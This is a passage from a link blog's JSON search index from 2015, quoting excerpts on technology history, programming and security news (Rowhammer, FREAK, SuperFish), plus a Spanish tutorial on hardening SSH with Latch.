builds like this Technic Dot Matrix Display by AncientJames from New Zealand. As the reel starts rolling, the patterns on the cards inside correspond with the patterns on the display and can show anything that fits into a 5x5 square. The creator’s video is titled, “Everything is awesome”. Well, this build certainly is!\n» Gergo Vas | kotaku.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/03/mechanical-lego-display-is-another-level-of-awesomeness/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou don’t often see clever builds like this Technic Dot Matrix Display\nby AncientJames from New Zealand. As the reel starts rolling, the\npatterns on the cards inside correspond with the patterns on the\ndisplay and can show anything that fits into a 5x5 square. The\ncreator’s video is titled, “Everything is awesome”. Well, this build\ncertainly is!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Gergo Vas | \u003ca href=\"http://kotaku.com/mechanical-lego-display-is-another-level-of-awesomeness-1699666287\"\u003ekotaku.com\u003c/a\u003e\u003c/p\u003e","title":"Mechanical LEGO Display Is Another Level Of Awesomeness"},{"content":" The pursuit of lock-picking is as old as the lock, which is itself as old as civilization. But in the entire history of the world, there was only one brief moment, lasting about 70 years, where you could put something under lock and key—a chest, a safe, your home—and have complete, unwavering certainty that no intruder could get to it. This is a feeling that security experts call “perfect security.” Since we lost perfect security in the 1850s, it has remained elusive. Despite tremendous leaps forward in security technology, we have never been able to get perfect security back.\n» 99% Invisible | slate.com\n","permalink":"http://karpoke.ignaciocano.com/2015/05/03/the-locksmith-who-picked-two-unbeatable-locks-and-ended-the-era-of-perfect-security/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe pursuit of lock-picking is as old as the lock, which is itself as\nold as civilization. But in the entire history of the world, there was\nonly one brief moment, lasting about 70 years, where you could put\nsomething under lock and key—a chest, a safe, your home—and have\ncomplete, unwavering certainty that no intruder could get to it. This\nis a feeling that security experts call “perfect security.” Since we\nlost perfect security in the 1850s, it has remained elusive. Despite\ntremendous leaps forward in security technology, we have never been\nable to get perfect security back.\u003c/p\u003e","title":"The Locksmith Who Picked Two “Unbeatable” Locks and Ended the Era of “Perfect Security”"},{"content":" El 19 de abril de 1965, Gordon Earle Moore publicaba una editorial en la revista Electronics que cambió el cómo entendíamos la tecnología. En ella aseguraba que la complejidad de los circuitos integrados se duplicaría cada año (luego se modificó para fijar el periodo de dos años), a la vez que los precios y costes de fabricación se verían reducidos. Cincuenta años después conocemos esta afirmación como la Ley de Moore, un exponente de la tecnología que se ha ido cumpliendo generación tras generación, pero con muchas dudas al respecto.\n» Pablo Espeso | xataka.com\n\u0026#34;50 años de la ley de Moore, quizás la \u0026#34;ley\u0026#34; más incomprendida de la tecnología\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2015/04/19/50-anos-de-la-ley-de-moore-quizas-la-ley-mas-incomprendida-de-la-tecnologia/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl 19 de abril de 1965, Gordon Earle Moore publicaba una editorial en\nla revista Electronics que cambió el cómo entendíamos la tecnología.\nEn ella aseguraba que la complejidad de los circuitos integrados se\nduplicaría cada año (luego se modificó para fijar el periodo de dos\naños), a la vez que los precios y costes de fabricación se verían\nreducidos. Cincuenta años después conocemos esta afirmación como la\nLey de Moore, un exponente de la tecnología que se ha ido cumpliendo\ngeneración tras generación, pero con muchas dudas al respecto.\u003c/p\u003e","title":"50 años de la ley de Moore, quizás la ”ley” más incomprendida de la tecnología"},{"content":" A complete simulation of the 6502 processor (used in the Commodore 64, Apple ][ and the NES).\n» visual6502.org\n","permalink":"http://karpoke.ignaciocano.com/2015/04/08/the-visual-6502/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA complete simulation of the 6502 processor (used in the Commodore 64,\nApple ][ and the NES).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.visual6502.org/JSSim/\"\u003evisual6502.org\u003c/a\u003e\u003c/p\u003e","title":"The Visual 6502"},{"content":" Ten years ago this week, the Linux kernel community faced a daunting challenge: They could no longer use their revision control system BitKeeper and no other Software Configuration Management (SCMs) met their needs for a distributed system. Linus Torvalds, the creator of Linux, took the challenge into his own hands and disappeared over the weekend to emerge the following week with Git. Today Git is used for thousands of projects and has ushered in a new level of social coding among programmers.\n» Jennifer Cloer | linux.com\n","permalink":"http://karpoke.ignaciocano.com/2015/04/07/10-years-of-git-an-interview-with-git-creator-linus-torvalds/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTen years ago this week, the Linux kernel community faced a daunting\nchallenge: They could no longer use their revision control system\nBitKeeper and no other Software Configuration Management (SCMs) met\ntheir needs for a distributed system. Linus Torvalds, the creator of\nLinux, took the challenge into his own hands and disappeared over the\nweekend to emerge the following week with Git. Today Git is used for\nthousands of projects and has ushered in a new level of social coding\namong programmers.\u003c/p\u003e","title":"10 Years of Git: An Interview with Git Creator Linus Torvalds"},{"content":" Pero nada, oye, les da igual. Da igual que las webs de descargas, con la ley en la mano, no sean ilegales. Da igual que ningún juez en España (ninguno, ¿eh? que se dice pronto) haya cerrado nunca una web de descargas. Da igual que las pocas que han cerrado lo hayan hecho motu proprio por miedo o por acorralamiento. Da igual que gran parte de las querellas contra webs de descargas ni siquiera hayan llegado a juicio, sino que los jueces hayan sobreseído los casos al ver evidente la ausencia de delito. Todo eso les da igual.\n» Carlos Otto | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2015/04/06/pirateria-cuando-la-mentira-repetida-mil-veces-se-convierte-en-verdad/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePero nada, oye, les da igual. Da igual que las webs de descargas, con\nla ley en la mano, no sean ilegales. Da igual que ningún juez en\nEspaña (ninguno, ¿eh? que se dice pronto) haya cerrado nunca una web\nde descargas. Da igual que las pocas que han cerrado lo hayan hecho\nmotu proprio por miedo o por acorralamiento. Da igual que gran parte\nde las querellas contra webs de descargas ni siquiera hayan llegado a\njuicio, sino que los jueces hayan sobreseído los casos al ver evidente\nla ausencia de delito. Todo eso les da igual.\u003c/p\u003e","title":"Piratería: cuando la mentira repetida mil veces se convierte en verdad"},{"content":" Security researchers at Ben Gurion University in Israel have found a way to retrieve data from an air-gapped computer using only heat emissions and a computer’s built-in thermal sensors. The method would allow attackers to surreptitiously siphon passwords or security keys from a protected system and transmit the data to an internet-connected system that’s in close proximity and that the attackers control. They could also use the internet-connected system to send malicious commands to the air-gapped system using the same heat and sensor technique. The proof-of-concept attack requires both systems to first be compromised with malware. And currently, the attack allows for just eight bits of data to be reliably transmitted over an hour—a rate that is sufficient for an attacker to transmit brief commands or siphon a password or secret key but not large amounts of data. It also works only if the air-gapped system is within 40 centimeters (about 15 inches) from the other computer the attackers control. But the researchers, at Ben Gurion’s Cyber Security Labs, note that this latter scenario is not uncommon, because air-gapped systems often sit on desktops alongside Internet-connected ones so that workers can easily access both.\n» Kim Zetter | wired.com\n","permalink":"http://karpoke.ignaciocano.com/2015/03/23/stealing-data-from-computers-using-heat/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSecurity researchers at Ben Gurion University in Israel have found a\nway to retrieve data from an air-gapped computer using only heat\nemissions and a computer’s built-in thermal sensors. The method would\nallow attackers to surreptitiously siphon passwords or security keys\nfrom a protected system and transmit the data to an internet-connected\nsystem that’s in close proximity and that the attackers control. They\ncould also use the internet-connected system to send malicious\ncommands to the air-gapped system using the same heat and sensor\ntechnique. The proof-of-concept attack requires both systems to first\nbe compromised with malware. And currently, the attack allows for just\neight bits of data to be reliably transmitted over an hour—a rate that\nis sufficient for an attacker to transmit brief commands or siphon a\npassword or secret key but not large amounts of data. It also works\nonly if the air-gapped system is within 40 centimeters (about 15\ninches) from the other computer the attackers control. But the\nresearchers, at Ben Gurion’s Cyber Security Labs, note that this\nlatter scenario is not uncommon, because air-gapped systems often sit\non desktops alongside Internet-connected ones so that workers can\neasily access both.\u003c/p\u003e","title":"Stealing Data From Computers Using Heat"},{"content":"Mediante Latch, podemos añadir una capa extra de seguridad a nuestro servicio SSH, limitando la ventana de tiempo durante la cual permitimos iniciar sesión en el servidor.\nInstalación Descargamos los paquetes que vamos a necesitar:\n$ sudo aptitude install gcc make $ sudo aptitude install libpam0g-dev libcurl4-gnutls-dev libssl-dev (Si ya teníamos instalado el paquete libcurl4-openssl-dev, podemos usar éste en lugar de libcurl4-gnutls-dev.)\nDescargamos el código de github y compilamos:\n$ git clone https://github.com/ElevenPaths/latch-plugin-unix.git $ cd latch-plugin-unix $ ./configure prefix=/usr sysconfdir=/etc \u0026amp;\u0026amp; make \u0026amp;\u0026amp; sudo make install Antes de continuar, vamos al área de desarrolladores y creamos una cuenta para este servicio. Ahí obtenemos el identificador de aplicación y la contraseña.\nConfiguración La instalación se puede hacer bien con un módulo PAM o bien configurando SSH.\nMódulo PAM Si vamos a configurar un módulo PAM, en la configuración del servicio que hemos creado en el área de desarrolladores, añadiremos una nueva \u0026ldquo;operación\u0026rdquo;, por ejemplo \u0026ldquo;sshd-login\u0026rdquo;, con lo que obtendremos una contraseña para esta operación en particular.\nEditamos el fichero /etc/latch/latch.conf para añadir nuestro identificador de aplicación, la contraseña. Especificamos la acción por defecto si el servicio de Latch no estuviera disponible (open o close) y añadirmos las diferentes contraseñas para las operaciones que hayamos definido en la cuenta.\nMovemos el fichero .so a su destino:\n$ sudo mv /usr/lib/pam_latch.so /lib/security/ Editamos el fichero /etc/pam.d/sshd, y añadimos al final:\nauth required pam_latch.so config=/etc/latch/latch.conf accounts=/etc/latch/latch.accounts operation=sshd-login otp=yes Igual que en el caso del servicio de SSH con sistema de verificación en dos pasos de Google, podemos añadir una regla justo antes de la que acabamos de definir para que las conexiones desde la misma red no sean examinadas:\nauth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf El contenido del fichero /etc/security/access-local.conf:\n+ : ALL : 192.168.50.0/24 + : ALL : LOCAL - : ALL : ALL Por último, sólo queda parear cada usuario que queramos utilizar. Desde la aplicación en el móvil, generamos un código de pareado. Utilizaremos el token proporcionado y ejecutaremos el siguiente comando:\n$ latch -p Account successfully paired to the user myuser Si queremos desparear un usuario:\n$ latch -u Configuración de SSH Si en lugar de añadir el módulo PAM, queremos configurar el servidor de SSH, editamos el fichero de configuración /etc/ssh/sshd_config y nos aseguramos de que contenga:\nUsePAM yes ChallengeResponseAuthentication yes PasswordAuthentication no Para proteger las claves de autorización, editamos el fichero de configuración de los usuario ~/.ssh/authorized_keys:\ncommand=\u0026#34;latch-ssh-cmd -o sshd-keys\u0026#34; ssh-rsa AAA...HP5 someone@host En este caso, hemos definido una nueva operación \u0026ldquo;sshd-keys\u0026rdquo; en la configuración de nuestra cuenta. También hay que tener en cuenta que si optamos por la opción de configurar el servicio SSH, mediante el comando latch-ssh-cmd no está disponible la opción de claves de un solo uso (OTP).\nDesinstalación Si queremos desinstalar Latch, basta que eliminemos los cambios que hemos hecho en /etc/pam.d/sshd, o /etc/ssh/sshd_config y ~/.ssh/authorized_keys, en caso de haber optado por la opción de configurar el servicio de SSH.\nA continuación, desde el directorio donde habíamos descargado el código, ejecutamos:\n$ ./configure prefix=/usr sysconfdir=/etc \u0026amp;\u0026amp; make \u0026amp;\u0026amp; sudo make uninstall ","permalink":"http://karpoke.ignaciocano.com/2015/03/22/servicio-de-ssh-con-latch-en-ubuntu/","summary":"\u003cp\u003eMediante \u003ca href=\"https://latch.elevenpaths.com/\"\u003eLatch\u003c/a\u003e, podemos añadir una capa extra de seguridad a nuestro\nservicio SSH, limitando la ventana de tiempo durante la cual permitimos\niniciar sesión en el servidor.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003eDescargamos los paquetes que vamos a necesitar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install gcc make\n$ sudo aptitude install libpam0g-dev libcurl4-gnutls-dev libssl-dev\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e(Si ya teníamos instalado el paquete \u003ccode\u003elibcurl4-openssl-dev\u003c/code\u003e, podemos\nusar éste en lugar de \u003ccode\u003elibcurl4-gnutls-dev\u003c/code\u003e.)\u003c/p\u003e\n\u003cp\u003eDescargamos el código de github y compilamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ git clone https://github.com/ElevenPaths/latch-plugin-unix.git\n$ cd latch-plugin-unix\n$ ./configure prefix=/usr sysconfdir=/etc \u0026amp;\u0026amp; make \u0026amp;\u0026amp; sudo make install\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAntes de continuar, vamos al \u003ca href=\"https://latch.elevenpaths.com/www/developers/editapplication\"\u003eárea de desarrolladores\u003c/a\u003e y creamos una\ncuenta para este servicio. Ahí obtenemos el identificador de aplicación\ny la contraseña.\u003c/p\u003e","title":"Servicio de SSH con Latch en Ubuntu"},{"content":" some tracking methods do attempt to track the user over a long time, and in particular attempt to make it difficult to evade the tracking. This is sometimes done for advertisement purposes, but can also be done to stop certain attacks like brute forcing or to identify attackers that return to a site. In its worst case, from a private perspective, the tracking is done to follow a user across various web sites. Over the years, browsers and plugins have provided a number of ways to restrict this tracking. Here are some of the more common techniques how tracking is done and how the user can prevent (some of) it\n» Johannes B. Ullrich | isc.sans.edu\n","permalink":"http://karpoke.ignaciocano.com/2015/03/15/11-ways-to-track-your-moves-when-using-a-web-browser/","summary":"\u003cblockquote\u003e\n\u003cp\u003esome tracking methods do attempt to track the user over a long time,\nand in particular attempt to make it difficult to evade the tracking.\nThis is sometimes done for advertisement purposes, but can also be\ndone to stop certain attacks like brute forcing or to identify\nattackers that return to a site. In its worst case, from a private\nperspective, the tracking is done to follow a user across various web\nsites. Over the years, browsers and plugins have provided a number of\nways to restrict this tracking. Here are some of the more common\ntechniques how tracking is done and how the user can prevent (some of)\nit\u003c/p\u003e","title":"11 Ways To Track Your Moves When Using a Web Browser"},{"content":" “Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process. When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.\n» Chris Evans | googleprojectzero.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2015/03/14/exploiting-the-dram-rowhammer-bug-to-gain-kernel-privileges/","summary":"\u003cblockquote\u003e\n\u003cp\u003e“Rowhammer” is a problem with some recent DRAM devices in which\nrepeatedly accessing a row of memory can cause bit flips in adjacent\nrows. We tested a selection of laptops and found that a subset of them\nexhibited the problem. We built two working privilege escalation\nexploits that use this effect. One exploit uses rowhammer-induced bit\nflips to gain kernel privileges on x86-64 Linux when run as an\nunprivileged userland process. When run on a machine vulnerable to the\nrowhammer problem, the process was able to induce bit flips in page\ntable entries (PTEs). It was able to use this to gain write access to\nits own page table, and hence gain read-write access to all of\nphysical memory.\u003c/p\u003e","title":"Exploiting the DRAM rowhammer bug to gain kernel privileges"},{"content":" Ever wondered why programmers are known as nightbirds? Why we stay up all night? Because it allows us to get into the zone, it allows us to focus on one thing and not have to worry about being interupted by someone - because they are all asleep. It’s a long stretch of the day where no one is up and no one is calling or trying to talk to us. It’s a great time to program, and think.\n» Macleod Sawyer | macleodsawyer.com\n","permalink":"http://karpoke.ignaciocano.com/2015/03/14/9-truths-that-computer-programmers-know-that-most-people-dont/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEver wondered why programmers are known as nightbirds? Why we stay up\nall night? Because it allows us to get into the zone, it allows us to\nfocus on one thing and not have to worry about being interupted by\nsomeone - because they are all asleep. It’s a long stretch of the day\nwhere no one is up and no one is calling or trying to talk to us. It’s\na great time to program, and think.\u003c/p\u003e","title":"9 truths that computer programmers know that most people don’t."},{"content":" If you’ve played games that have breast physics, you’ve probably seen how uncommon it is for games to show breasts that move like what they actually are: bags of fat affected by gravity. Instead, it’s more likely for a game to depict breasts as helium balloons that have minds of their own. Certain games have failed at rendering realistic breasts so widely that some people seem convinced that bad breast physics are the result of sexism, or of an industry that likes to objectify women. I’ve seen unfair conjecture about whether or not developers have ever interacted with real-life breasts. I’ve seen people imply that developers simply don’t know how to properly characterize women in games, and that gaming’s ocean of unrealistic breasts is what happens when we have so few women developing games.\n» Patricia Hernandez | kotaku.com\n","permalink":"http://karpoke.ignaciocano.com/2015/03/12/how-video-game-breasts-are-made-and-why-they-can-go-wrong/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you’ve played games that have breast physics, you’ve probably seen\nhow uncommon it is for games to show breasts that move like what they\nactually are: bags of fat affected by gravity. Instead, it’s more\nlikely for a game to depict breasts as helium balloons that have minds\nof their own. Certain games have failed at rendering realistic breasts\nso widely that some people seem convinced that bad breast physics are\nthe result of sexism, or of an industry that likes to objectify women.\nI’ve seen unfair conjecture about whether or not developers have ever\ninteracted with real-life breasts. I’ve seen people imply that\ndevelopers simply don’t know how to properly characterize women in\ngames, and that gaming’s ocean of unrealistic breasts is what happens\nwhen we have so few women developing games.\u003c/p\u003e","title":"How Video Game Breasts Are Made (And Why They Can Go Wrong)"},{"content":" I’m a programmer. I write games. Games programmers get a lot of respect, but none of them, not me, not Carmak, and not Abrash. None of them deserve the honour which I want to bestow on David Horne. This is because David Horne wrote the greatest program ever written: 1k chess on the ZX81. David Horne is not an urban myth. David Horne achieved what many would even now consider impossible. He wrote a chess game, with AI, that ran on a poorly documented, buggy machine that contained only 1k of memory.\n» thad.frogley.info\n","permalink":"http://karpoke.ignaciocano.com/2015/03/08/the-greatest-program-ever-written/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’m a programmer. I write games. Games programmers get a lot of\nrespect, but none of them, not me, not Carmak, and not Abrash. None of\nthem deserve the honour which I want to bestow on David Horne. This is\nbecause David Horne wrote the greatest program ever written: 1k chess\non the ZX81. David Horne is not an urban myth. David Horne achieved\nwhat many would even now consider impossible. He wrote a chess game,\nwith AI, that ran on a poorly documented, buggy machine that contained\nonly 1k of memory.\u003c/p\u003e","title":"The greatest program ever written"},{"content":" So you want to write a Lisp interpreter? Welcome! The goal of the Make-A-Lisp project is to make it easy to write your own Lisp interpreter without sacrificing those many ”Aha!” moments that come from ascending the McCarthy mountain. When you reach the peak of this particular mountain, you will have an interpreter for the mal Lisp language that is powerful enough to be self-hosting, meaning it will be able to run a mal interpreter written in mal itself.\n» kanaka | github.com\n","permalink":"http://karpoke.ignaciocano.com/2015/03/08/the-makelisp-process/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSo you want to write a Lisp interpreter? Welcome! The goal of the\nMake-A-Lisp project is to make it easy to write your own Lisp\ninterpreter without sacrificing those many ”Aha!” moments that come\nfrom ascending the McCarthy mountain. When you reach the peak of this\nparticular mountain, you will have an interpreter for the mal Lisp\nlanguage that is powerful enough to be self-hosting, meaning it will\nbe able to run a mal interpreter written in mal itself.\u003c/p\u003e","title":"The MakeLisp Process"},{"content":" A group of cryptographers at INRIA, Microsoft Research and IMDEA have discovered some serious vulnerabilities in OpenSSL (e.g., Android) clients and Apple TLS/SSL clients (e.g., Safari) that allow a ’man in the middle attacker’ to downgrade connections from ’strong’ RSA to ’export-grade’ RSA. These attacks are real and exploitable against a shocking number of websites \u0026ndash; including government websites.\n» Matthew Green | blog.cryptographyengineering.com\n","permalink":"http://karpoke.ignaciocano.com/2015/03/05/attack-of-the-week-freak-or-factoring-the-nsa-for-fun-and-profit/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA group of cryptographers at INRIA, Microsoft Research and IMDEA have\ndiscovered some serious vulnerabilities in OpenSSL (e.g., Android)\nclients and Apple TLS/SSL clients (e.g., Safari) that allow a ’man in\nthe middle attacker’ to downgrade connections from ’strong’ RSA to\n’export-grade’ RSA. These attacks are real and exploitable against a\nshocking number of websites \u0026ndash; including government websites.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Matthew Green | \u003ca href=\"http://blog.cryptographyengineering.com/2015/03/attack-of-week-freak-or-factoring-nsa.html\"\u003eblog.cryptographyengineering.com\u003c/a\u003e\u003c/p\u003e","title":"Attack of the week: FREAK (or ’factoring the NSA for fun and profit’)"},{"content":" Gracias a la desbordante imaginación de una dama victoriana del siglo XIX pudimos dar el salto del cálculo a la computación. Ada creó el primer programa de ordenador en su mente, simulando una máquina que nunca existió. La informática nació dentro del cerebro de una mujer.\n» txipi | blog.txipinet.com\n","permalink":"http://karpoke.ignaciocano.com/2015/03/01/computadoras-imprescindibles/","summary":"\u003cblockquote\u003e\n\u003cp\u003eGracias a la desbordante imaginación de una dama victoriana del siglo\nXIX pudimos dar el salto del cálculo a la computación. Ada creó el\nprimer programa de ordenador en su mente, simulando una máquina que\nnunca existió. La informática nació dentro del cerebro de una mujer.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» txipi | \u003ca href=\"http://blog.txipinet.com/2015/02/28/computadoras-imprescindibles/\"\u003eblog.txipinet.com\u003c/a\u003e\u003c/p\u003e","title":"Computadoras imprescindibles"},{"content":" Tim Peters developed the Timsort hybrid sorting algorithm in 2002. It is a clever combination of ideas from merge sort and insertion sort, and designed to perform well on real world data. TimSort was first developed for Python, but later ported to Java (where it appears as java.util.Collections.sort and java.util.Arrays.sort) by Joshua Bloch (the designer of Java Collections who also pointed out that most binary search algorithms were broken). TimSort is today used as the default sorting algorithm for Android SDK, Sun’s JDK and OpenJDK. Given the popularity of these platforms this means that the number of computers, cloud services and mobile phones that use TimSort for sorting is well into the billions. Fast forward to 2015. After we had successfully verified Counting and Radix sort implementations in Java (J. Autom. Reasoning 53(2), 129-139) with a formal verification tool called KeY, we were looking for a new challenge. TimSort seemed to fit the bill, as it is rather complex and widely used. Unfortunately, we weren’t able to prove its correctness. A closer analysis showed that this was, quite simply, because TimSort was broken and our theoretical considerations finally led us to a path towards finding the bug (interestingly, that bug appears already in the Python implementation). This blog post shows how we did it.\n» Stijn de Gouw | envisage-project.eu\n","permalink":"http://karpoke.ignaciocano.com/2015/02/28/proving-that-androids-javas-and-pythons-sorting-algorithm-is-broken-and-showing-how-to-fix-it/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTim Peters developed the Timsort hybrid sorting algorithm in 2002. It\nis a clever combination of ideas from merge sort and insertion sort,\nand designed to perform well on real world data. TimSort was first\ndeveloped for Python, but later ported to Java (where it appears as\njava.util.Collections.sort and java.util.Arrays.sort) by Joshua Bloch\n(the designer of Java Collections who also pointed out that most\nbinary search algorithms were broken). TimSort is today used as the\ndefault sorting algorithm for Android SDK, Sun’s JDK and OpenJDK.\nGiven the popularity of these platforms this means that the number of\ncomputers, cloud services and mobile phones that use TimSort for\nsorting is well into the billions. Fast forward to 2015. After we had\nsuccessfully verified Counting and Radix sort implementations in Java\n(J. Autom. Reasoning 53(2), 129-139) with a formal verification tool\ncalled KeY, we were looking for a new challenge. TimSort seemed to fit\nthe bill, as it is rather complex and widely used. Unfortunately, we\nweren’t able to prove its correctness. A closer analysis showed that\nthis was, quite simply, because TimSort was broken and our theoretical\nconsiderations finally led us to a path towards finding the bug\n(interestingly, that bug appears already in the Python\nimplementation). This blog post shows how we did it.\u003c/p\u003e","title":"Proving that Android’s, Java’s and Python’s sorting algorithm is broken (and showing how to fix it)"},{"content":" I extracted the certificate from the SuperFish adware and cracked the password (”komodia”) that encrypted it. I discuss how down below. The consequence is that I can intercept the encrypted communications of SuperFish’s victims (people with Lenovo laptops) while hanging out near them at a cafe wifi hotspot. Note: this is probably trafficking in illegal access devices under the proposed revisions to the CFAA, so get it now before they change the law.\n» Robert Graham | blog.erratasec.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/23/extracting-the-superfish-certificate/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI extracted the certificate from the SuperFish adware and cracked the\npassword (”komodia”) that encrypted it. I discuss how down below. The\nconsequence is that I can intercept the encrypted communications of\nSuperFish’s victims (people with Lenovo laptops) while hanging out\nnear them at a cafe wifi hotspot. Note: this is probably trafficking\nin illegal access devices under the proposed revisions to the CFAA, so\nget it now before they change the law.\u003c/p\u003e","title":"Extracting the SuperFish certificate"},{"content":" Other users are reporting that the adware actually installs its own self-signed certificate authority which effectively allows the software to snoop on secure connections, like banking websites as pictured in action below. This is a malicious technique commonly known as a man-in-the middle attack, where the certificate allows the software to decrypt secure requests, yet Lenovo appears to be shipping this software with some of its products out of the box.\n» thenextweb.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/23/lenovo-caught-installing-adware-on-new-computers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOther users are reporting that the adware actually installs its own\nself-signed certificate authority which effectively allows the\nsoftware to snoop on secure connections, like banking websites as\npictured in action below. This is a malicious technique commonly known\nas a man-in-the middle attack, where the certificate allows the\nsoftware to decrypt secure requests, yet Lenovo appears to be shipping\nthis software with some of its products out of the box.\u003c/p\u003e","title":"Lenovo caught installing adware on new computers"},{"content":" The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba, and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world’s computers, according to cyber researchers and former operatives.\n» Joseph Menn | businessinsider.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/23/nsa-has-hidden-software-in-hard-drives-around-the-world/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe U.S. National Security Agency has figured out how to hide spying\nsoftware deep within hard drives made by Western Digital, Seagate,\nToshiba, and other top manufacturers, giving the agency the means to\neavesdrop on the majority of the world’s computers, according to cyber\nresearchers and former operatives.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Joseph Menn | \u003ca href=\"http://www.businessinsider.com/r-russian-researchers-expose-breakthrough-us-spying-program-2015-2\"\u003ebusinessinsider.com\u003c/a\u003e\u003c/p\u003e","title":"NSA has hidden software in hard drives around the world"},{"content":" Enter Digital Rights Management in its most primitive forms: let’s call it DRM 0.96. They introduced physical indicia which the software checked for—deliberate damage, dongles, hidden sectors—and challenge-response protocols that required possession of large, unwieldy manuals that were difficult to copy. These failed for two reasons. First, they were commercially unpopular, because they reduced the usefulness of the software to the legitimate purchasers. Honest buyers resented the non-functionality of their backups, they hated the loss of scarce ports to the authentication dongles, and they chafed at the inconvenience of having to lug around large manuals when they wanted to run their software. Second, these didn’t stop pirates, who found it trivial to patch the software and bypass authentication. People who took the software without paying for it were untouched.\n» Cory Doctorow | boingboing.net\n","permalink":"http://karpoke.ignaciocano.com/2015/02/23/the-coming-war-on-general-purpose-computing/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEnter Digital Rights Management in its most primitive forms: let’s\ncall it DRM 0.96. They introduced physical indicia which the software\nchecked for—deliberate damage, dongles, hidden sectors—and\nchallenge-response protocols that required possession of large,\nunwieldy manuals that were difficult to copy. These failed for two\nreasons. First, they were commercially unpopular, because they reduced\nthe usefulness of the software to the legitimate purchasers. Honest\nbuyers resented the non-functionality of their backups, they hated the\nloss of scarce ports to the authentication dongles, and they chafed at\nthe inconvenience of having to lug around large manuals when they\nwanted to run their software. Second, these didn’t stop pirates, who\nfound it trivial to patch the software and bypass authentication.\nPeople who took the software without paying for it were untouched.\u003c/p\u003e","title":"The coming war on general-purpose computing"},{"content":" Originally, there was kSplice as a standalone project that implemented stop_machine()-based patching for the linux kernel. This project got later acquired, and the current owner is providing live patching as a proprietary service, without any intentions to have their implementation merged. Then, due to rising user/customer demand, both Red Hat and SUSE started working on their own implementation (not knowing about each other), and announced first versions roughly at the same time.\n» Jiri Kosina | lkml.org\n","permalink":"http://karpoke.ignaciocano.com/2015/02/23/live-patching-for-3-20/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOriginally, there was kSplice as a standalone project that implemented\nstop_machine()-based patching for the linux kernel. This project got\nlater acquired, and the current owner is providing live patching as a\nproprietary service, without any intentions to have their\nimplementation merged. Then, due to rising user/customer demand, both\nRed Hat and SUSE started working on their own implementation (not\nknowing about each other), and announced first versions roughly at the\nsame time.\u003c/p\u003e","title":"Live patching for 3.20"},{"content":" En 1972 se ponía en venta en las tiendas norteamericanas la Magnavox Odyssey, la primera videoconsola de la historia. Un año antes un estudiante de la Universidad de Stanford y su socio habían construido la primera máquina recreativa de la historia. A partir de estos dos acontecimientos clave los videojuegos comenzaron a popularizarse creando a día de hoy una gigantesca industria de ocio y entretenimiento capaz de competir en seguidores y volumen de ventas con el cine o la música.\n» documentalium.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2015/02/18/historia-de-los-videojuegos-los-origenes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn 1972 se ponía en venta en las tiendas norteamericanas la Magnavox\nOdyssey, la primera videoconsola de la historia. Un año antes un\nestudiante de la Universidad de Stanford y su socio habían construido\nla primera máquina recreativa de la historia. A partir de estos dos\nacontecimientos clave los videojuegos comenzaron a popularizarse\ncreando a día de hoy una gigantesca industria de ocio y\nentretenimiento capaz de competir en seguidores y volumen de ventas\ncon el cine o la música.\u003c/p\u003e","title":"Historia de los videojuegos: los orígenes"},{"content":" The Python reference documentation explicitly documents this behavior in the section on for loops:\nThe for-loop makes assignments to the variables(s) in the target list. [\u0026hellip;] Names in the target list are not deleted when the loop is finished, but if the sequence is empty, they will not have been assigned to at all by the loop.\n» Eli Bendersky | eli.thegreenplace.net\n","permalink":"http://karpoke.ignaciocano.com/2015/02/18/the-scope-of-index-variables-in-pythons-for-loops/","summary":"\u003cblockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe Python reference documentation explicitly documents this behavior\nin the section on for loops:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe for-loop makes assignments to the variables(s) in the target\nlist. 